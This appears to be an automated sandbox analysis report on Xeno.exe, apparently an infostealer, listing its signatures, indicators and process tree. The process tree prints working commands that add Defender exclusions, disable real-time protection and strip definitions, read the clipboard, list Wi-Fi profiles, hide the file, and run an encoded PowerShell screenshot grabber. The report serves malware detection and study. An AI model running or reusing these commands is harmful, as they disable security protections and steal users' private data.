Analysis
-
max time kernel
141s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
14-12-2024 07:31
Behavioral task
behavioral1
Sample
Xeno.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Xeno.exe
Resource
win10v2004-20241007-en
General
-
Target
Xeno.exe
-
Size
7.0MB
-
MD5
4cada3a12ec0ee75e590026cadbf82b7
-
SHA1
9454d5eff1fe850cad41f7074cd88b6afc059f2e
-
SHA256
7982ef7df2aee22865b90faff6823404718065e2f3560009b7b8b418d72b12d6
-
SHA512
8b55efd43497a1bf1c6e6db3502c32c8ed278661a8a33d55647fc17ab914a4662bf612b1d13ea932bb3c3f14dcd03ffa14c4a0ae338f83b1644aa193598b2727
-
SSDEEP
98304:UtevITBg6zamaHl3Ne4i3lqoFhTWrf9eQc0MJYzwZNqkzmas5J1n6ksB0rNHMk:UGIieNlpYfMQc2sEhn6ksqZ
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4264 powershell.exe 3464 powershell.exe 672 powershell.exe 4004 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Xeno.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 780 cmd.exe 4072 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 5028 rar.exe -
Loads dropped DLL 16 IoCs
pid Process 4120 Xeno.exe 4120 Xeno.exe 4120 Xeno.exe 4120 Xeno.exe 4120 Xeno.exe 4120 Xeno.exe 4120 Xeno.exe 4120 Xeno.exe 4120 Xeno.exe 4120 Xeno.exe 4120 Xeno.exe 4120 Xeno.exe 4120 Xeno.exe 4120 Xeno.exe 4120 Xeno.exe 4120 Xeno.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 22 ip-api.com 14 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 2292 tasklist.exe 4660 tasklist.exe 4412 tasklist.exe 2632 tasklist.exe 3484 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 3468 cmd.exe -
resource yara_rule behavioral2/files/0x0007000000023c67-21.dat upx behavioral2/memory/4120-25-0x00007FFC6EA70000-0x00007FFC6F059000-memory.dmp upx behavioral2/files/0x0007000000023c5a-27.dat upx behavioral2/memory/4120-48-0x00007FFC86D40000-0x00007FFC86D4F000-memory.dmp upx behavioral2/memory/4120-47-0x00007FFC7EAD0000-0x00007FFC7EAF4000-memory.dmp upx behavioral2/files/0x0007000000023c61-46.dat upx behavioral2/files/0x0007000000023c60-45.dat upx behavioral2/files/0x0008000000023c5f-44.dat upx behavioral2/files/0x0007000000023c5e-43.dat upx behavioral2/files/0x0007000000023c5d-42.dat upx behavioral2/files/0x0007000000023c5c-41.dat upx behavioral2/files/0x0007000000023c5b-40.dat upx behavioral2/files/0x0007000000023c59-39.dat upx behavioral2/files/0x0007000000023c6c-38.dat upx behavioral2/files/0x0007000000023c6b-37.dat upx behavioral2/files/0x0007000000023c6a-36.dat upx behavioral2/files/0x0007000000023c66-33.dat upx behavioral2/files/0x0007000000023c64-32.dat upx behavioral2/files/0x0007000000023c65-30.dat upx behavioral2/memory/4120-54-0x00007FFC7E890000-0x00007FFC7E8BD000-memory.dmp upx behavioral2/memory/4120-56-0x00007FFC7E6B0000-0x00007FFC7E6C9000-memory.dmp upx behavioral2/memory/4120-58-0x00007FFC82EE0000-0x00007FFC82F03000-memory.dmp upx behavioral2/memory/4120-60-0x00007FFC6E160000-0x00007FFC6E2D0000-memory.dmp upx behavioral2/memory/4120-62-0x00007FFC7E560000-0x00007FFC7E579000-memory.dmp upx behavioral2/memory/4120-64-0x00007FFC84160000-0x00007FFC8416D000-memory.dmp upx behavioral2/memory/4120-71-0x00007FFC7DD00000-0x00007FFC7DDB8000-memory.dmp upx behavioral2/memory/4120-72-0x00007FFC6DD10000-0x00007FFC6E085000-memory.dmp upx behavioral2/memory/4120-70-0x00007FFC7E6F0000-0x00007FFC7E71E000-memory.dmp upx behavioral2/memory/4120-78-0x00007FFC6E890000-0x00007FFC6E9AC000-memory.dmp upx behavioral2/memory/4120-77-0x00007FFC84150000-0x00007FFC8415D000-memory.dmp upx behavioral2/memory/4120-74-0x00007FFC7E6D0000-0x00007FFC7E6E4000-memory.dmp upx behavioral2/memory/4120-69-0x00007FFC7EAD0000-0x00007FFC7EAF4000-memory.dmp upx behavioral2/memory/4120-68-0x00007FFC6EA70000-0x00007FFC6F059000-memory.dmp upx behavioral2/memory/4120-98-0x00007FFC7E6B0000-0x00007FFC7E6C9000-memory.dmp upx behavioral2/memory/4120-105-0x00007FFC6E160000-0x00007FFC6E2D0000-memory.dmp upx behavioral2/memory/4120-104-0x00007FFC82EE0000-0x00007FFC82F03000-memory.dmp upx behavioral2/memory/4120-158-0x00007FFC7E560000-0x00007FFC7E579000-memory.dmp upx behavioral2/memory/4120-237-0x00007FFC7DD00000-0x00007FFC7DDB8000-memory.dmp upx behavioral2/memory/4120-236-0x00007FFC7E6F0000-0x00007FFC7E71E000-memory.dmp upx behavioral2/memory/4120-240-0x00007FFC6DD10000-0x00007FFC6E085000-memory.dmp upx behavioral2/memory/4120-263-0x00007FFC6E160000-0x00007FFC6E2D0000-memory.dmp upx behavioral2/memory/4120-257-0x00007FFC6EA70000-0x00007FFC6F059000-memory.dmp upx behavioral2/memory/4120-258-0x00007FFC7EAD0000-0x00007FFC7EAF4000-memory.dmp upx behavioral2/memory/4120-292-0x00007FFC6EA70000-0x00007FFC6F059000-memory.dmp upx behavioral2/memory/4120-307-0x00007FFC6EA70000-0x00007FFC6F059000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2944 cmd.exe 2208 netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4868 WMIC.exe 3204 WMIC.exe 1104 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4052 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 3464 powershell.exe 4264 powershell.exe 4264 powershell.exe 3464 powershell.exe 4072 powershell.exe 4072 powershell.exe 4044 powershell.exe 4044 powershell.exe 4072 powershell.exe 4044 powershell.exe 672 powershell.exe 672 powershell.exe 2804 powershell.exe 2804 powershell.exe 4004 powershell.exe 4004 powershell.exe 2244 powershell.exe 2244 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3484 tasklist.exe Token: SeDebugPrivilege 3464 powershell.exe Token: SeIncreaseQuotaPrivilege 4580 WMIC.exe Token: SeSecurityPrivilege 4580 WMIC.exe Token: SeTakeOwnershipPrivilege 4580 WMIC.exe Token: SeLoadDriverPrivilege 4580 WMIC.exe Token: SeSystemProfilePrivilege 4580 WMIC.exe Token: SeSystemtimePrivilege 4580 WMIC.exe Token: SeProfSingleProcessPrivilege 4580 WMIC.exe Token: SeIncBasePriorityPrivilege 4580 WMIC.exe Token: SeCreatePagefilePrivilege 4580 WMIC.exe Token: SeBackupPrivilege 4580 WMIC.exe Token: SeRestorePrivilege 4580 WMIC.exe Token: SeShutdownPrivilege 4580 WMIC.exe Token: SeDebugPrivilege 4580 WMIC.exe Token: SeSystemEnvironmentPrivilege 4580 WMIC.exe Token: SeRemoteShutdownPrivilege 4580 WMIC.exe Token: SeUndockPrivilege 4580 WMIC.exe Token: SeManageVolumePrivilege 4580 WMIC.exe Token: 33 4580 WMIC.exe Token: 34 4580 WMIC.exe Token: 35 4580 WMIC.exe Token: 36 4580 WMIC.exe Token: SeDebugPrivilege 4264 powershell.exe Token: SeIncreaseQuotaPrivilege 4580 WMIC.exe Token: SeSecurityPrivilege 4580 WMIC.exe Token: SeTakeOwnershipPrivilege 4580 WMIC.exe Token: SeLoadDriverPrivilege 4580 WMIC.exe Token: SeSystemProfilePrivilege 4580 WMIC.exe Token: SeSystemtimePrivilege 4580 WMIC.exe Token: SeProfSingleProcessPrivilege 4580 WMIC.exe Token: SeIncBasePriorityPrivilege 4580 WMIC.exe Token: SeCreatePagefilePrivilege 4580 WMIC.exe Token: SeBackupPrivilege 4580 WMIC.exe Token: SeRestorePrivilege 4580 WMIC.exe Token: SeShutdownPrivilege 4580 WMIC.exe Token: SeDebugPrivilege 4580 WMIC.exe Token: SeSystemEnvironmentPrivilege 4580 WMIC.exe Token: SeRemoteShutdownPrivilege 4580 WMIC.exe Token: SeUndockPrivilege 4580 WMIC.exe Token: SeManageVolumePrivilege 4580 WMIC.exe Token: 33 4580 WMIC.exe Token: 34 4580 WMIC.exe Token: 35 4580 WMIC.exe Token: 36 4580 WMIC.exe Token: SeIncreaseQuotaPrivilege 4868 WMIC.exe Token: SeSecurityPrivilege 4868 WMIC.exe Token: SeTakeOwnershipPrivilege 4868 WMIC.exe Token: SeLoadDriverPrivilege 4868 WMIC.exe Token: SeSystemProfilePrivilege 4868 WMIC.exe Token: SeSystemtimePrivilege 4868 WMIC.exe Token: SeProfSingleProcessPrivilege 4868 WMIC.exe Token: SeIncBasePriorityPrivilege 4868 WMIC.exe Token: SeCreatePagefilePrivilege 4868 WMIC.exe Token: SeBackupPrivilege 4868 WMIC.exe Token: SeRestorePrivilege 4868 WMIC.exe Token: SeShutdownPrivilege 4868 WMIC.exe Token: SeDebugPrivilege 4868 WMIC.exe Token: SeSystemEnvironmentPrivilege 4868 WMIC.exe Token: SeRemoteShutdownPrivilege 4868 WMIC.exe Token: SeUndockPrivilege 4868 WMIC.exe Token: SeManageVolumePrivilege 4868 WMIC.exe Token: 33 4868 WMIC.exe Token: 34 4868 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3024 wrote to memory of 4120 3024 Xeno.exe 83 PID 3024 wrote to memory of 4120 3024 Xeno.exe 83 PID 4120 wrote to memory of 2868 4120 Xeno.exe 84 PID 4120 wrote to memory of 2868 4120 Xeno.exe 84 PID 4120 wrote to memory of 2692 4120 Xeno.exe 85 PID 4120 wrote to memory of 2692 4120 Xeno.exe 85 PID 4120 wrote to memory of 2764 4120 Xeno.exe 88 PID 4120 wrote to memory of 2764 4120 Xeno.exe 88 PID 4120 wrote to memory of 1484 4120 Xeno.exe 90 PID 4120 wrote to memory of 1484 4120 Xeno.exe 90 PID 2764 wrote to memory of 3484 2764 cmd.exe 92 PID 2764 wrote to memory of 3484 2764 cmd.exe 92 PID 2868 wrote to memory of 4264 2868 cmd.exe 93 PID 2868 wrote to memory of 4264 2868 cmd.exe 93 PID 2692 wrote to memory of 3464 2692 cmd.exe 94 PID 2692 wrote to memory of 3464 2692 cmd.exe 94 PID 1484 wrote to memory of 4580 1484 cmd.exe 95 PID 1484 wrote to memory of 4580 1484 cmd.exe 95 PID 4120 wrote to memory of 992 4120 Xeno.exe 97 PID 4120 wrote to memory of 992 4120 Xeno.exe 97 PID 992 wrote to memory of 4080 992 cmd.exe 99 PID 992 wrote to memory of 4080 992 cmd.exe 99 PID 4120 wrote to memory of 4900 4120 Xeno.exe 100 PID 4120 wrote to memory of 4900 4120 Xeno.exe 100 PID 4900 wrote to memory of 4220 4900 cmd.exe 102 PID 4900 wrote to memory of 4220 4900 cmd.exe 102 PID 4120 wrote to memory of 5016 4120 Xeno.exe 103 PID 4120 wrote to memory of 5016 4120 Xeno.exe 103 PID 5016 wrote to memory of 4868 5016 cmd.exe 105 PID 5016 wrote to memory of 4868 5016 cmd.exe 105 PID 4120 wrote to memory of 404 4120 Xeno.exe 106 PID 4120 wrote to memory of 404 4120 Xeno.exe 106 PID 404 wrote to memory of 3204 404 cmd.exe 108 PID 404 wrote to memory of 3204 404 cmd.exe 108 PID 4120 wrote to memory of 3468 4120 Xeno.exe 163 PID 4120 wrote to memory of 3468 4120 Xeno.exe 163 PID 3468 wrote to memory of 1724 3468 cmd.exe 111 PID 3468 wrote to memory of 1724 3468 cmd.exe 111 PID 4120 wrote to memory of 3516 4120 Xeno.exe 112 PID 4120 wrote to memory of 3516 4120 Xeno.exe 112 PID 4120 wrote to memory of 1148 4120 Xeno.exe 114 PID 4120 wrote to memory of 1148 4120 Xeno.exe 114 PID 3516 wrote to memory of 4660 3516 cmd.exe 116 PID 3516 wrote to memory of 4660 3516 cmd.exe 116 PID 1148 wrote to memory of 2292 1148 cmd.exe 117 PID 1148 wrote to memory of 2292 1148 cmd.exe 117 PID 4120 wrote to memory of 1436 4120 Xeno.exe 118 PID 4120 wrote to memory of 1436 4120 Xeno.exe 118 PID 1436 wrote to memory of 2196 1436 cmd.exe 120 PID 1436 wrote to memory of 2196 1436 cmd.exe 120 PID 4120 wrote to memory of 4804 4120 Xeno.exe 121 PID 4120 wrote to memory of 4804 4120 Xeno.exe 121 PID 4120 wrote to memory of 780 4120 Xeno.exe 122 PID 4120 wrote to memory of 780 4120 Xeno.exe 122 PID 4120 wrote to memory of 4648 4120 Xeno.exe 125 PID 4120 wrote to memory of 4648 4120 Xeno.exe 125 PID 4120 wrote to memory of 2944 4120 Xeno.exe 127 PID 4120 wrote to memory of 2944 4120 Xeno.exe 127 PID 4120 wrote to memory of 1164 4120 Xeno.exe 128 PID 4120 wrote to memory of 1164 4120 Xeno.exe 128 PID 4120 wrote to memory of 3920 4120 Xeno.exe 130 PID 4120 wrote to memory of 3920 4120 Xeno.exe 130 PID 4120 wrote to memory of 4484 4120 Xeno.exe 132 PID 4120 wrote to memory of 4484 4120 Xeno.exe 132 -
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 1724 attrib.exe 3892 attrib.exe 1760 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Xeno.exe"C:\Users\Admin\AppData\Local\Temp\Xeno.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Users\Admin\AppData\Local\Temp\Xeno.exe"C:\Users\Admin\AppData\Local\Temp\Xeno.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4120 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Xeno.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Xeno.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:4080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:4220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:4868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Xeno.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\Xeno.exe"4⤵
- Views/modifies file attributes
PID:1724
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3516 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:2196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4804
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:4072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4648
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2944 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:1164
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:3920
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:4956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:4484
-
